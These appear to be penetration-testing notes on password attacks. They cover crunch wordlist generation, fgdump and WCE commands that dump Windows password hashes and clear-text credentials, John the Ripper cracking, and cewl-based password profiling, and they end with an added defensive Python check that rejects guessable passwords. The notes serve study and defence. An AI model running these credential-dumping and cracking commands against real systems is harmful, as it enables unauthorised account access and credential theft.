man crunch
ls -la /usr/share/crunch/charset.lst
crunch 6 6 0123456789ABCDEF -o list.txt
# Create a file of passwords 6 characters long using 0-F and save it to a file
crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha -o mixedalpha.txt
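# 4-character passwords using the mixalpha set from crunch's pre-defined charset list
crunch 8 8 -t ,@@^^%%% | more
# Pattern: , = uppercase, @ = lowercase, ^ = symbol, % = digit. Produces passwords similar to Abc$#123, Jud()666, Hol&&278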
PWdump/FGdump
You need to have admin access to run those two commands.
fgdump.exe
# Run it. Dumps the hashes to a file to be used and cracked later
type 127.0.0.1.pwdump
# Access the contents of the file generated from fgdump.exe command
WCE (Windows Credential Editor)
Needs admin access.
wce64.exe -w
# Run it. Dumps passwords in clear text
John the Ripper
john hashes.txt
# Run it. Cracks the password hashes on Kali Linux using a dictionary/brute-force attack (MAY TAKE LONG)
Password Profiling
Collect words/phrases associated with the organisation and include them in our wordlist (e.g. 33 Company uses thirtythree password combinations)
Tool: cewl. Creates passwords from words/phrases
cewl www.domain.com -m 6 -w /root/domain-cel.txt
# Creates a password wordlist txt for the domain (-m 6: words of at least 6 characters)
In combination with John the Ripper
vi /etc/john/john.conf
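(ADD) $[0-9]$[0-9]
# The added rule appends two digits (00-99) to each word
john --wordlist=megacorp-cewl.txt --rules --stdout > mutated.txt
# Applies the rules to the cewl wordlist and writes the mutated candidates to mutated.txt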
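
The same mutation seen from the defender's side, as an added example that is not part of the original notes: a password-policy check that rejects any candidate the profiled wordlist plus the two-digit rule above would produce. The sample words, the function names and the case-insensitive matching are assumptions made for the illustration.

```python
import re

# Constructed sample: words a cewl crawl of an organisation's site might yield.
SAMPLE_WORDLIST = ["megacorp", "thirtythree", "Widgets", "nano"]

# Mirrors the $[0-9]$[0-9] rule: a base word followed by exactly two ASCII digits.
TWO_DIGIT_SUFFIX = re.compile(r"(.+)([0-9]{2})")


def load_words(lines, min_len=6):
    """Normalise a wordlist: strip whitespace, drop words shorter than
    min_len (as cewl -m 6 does) and casefold for case-insensitive lookup."""
    return {w.strip().casefold() for w in lines if len(w.strip()) >= min_len}


def profiled_match(candidate, words):
    """Return why a candidate is guessable from the profiled list, or None."""
    if candidate.casefold() in words:
        return "wordlist word"
    m = TWO_DIGIT_SUFFIX.fullmatch(candidate)
    if m and m.group(1).casefold() in words:
        return "wordlist word + two digits"
    return None


def audit(candidates, words):
    """Map each candidate password to its rejection reason (None = not matched)."""
    return {c: profiled_match(c, words) for c in candidates}


if __name__ == "__main__":
    words = load_words(SAMPLE_WORDLIST)
    # Constructed candidates, e.g. passwords proposed at a change-password prompt.
    for pw, reason in audit(["Megacorp07", "thirtythree", "megacorp123", "nano42"], words).items():
        print(f"{pw:12} -> {'REJECT: ' + reason if reason else 'not in profiled set'}")
```

A check like this belongs in the password-change path, fed with the organisation's own names, products and slogans.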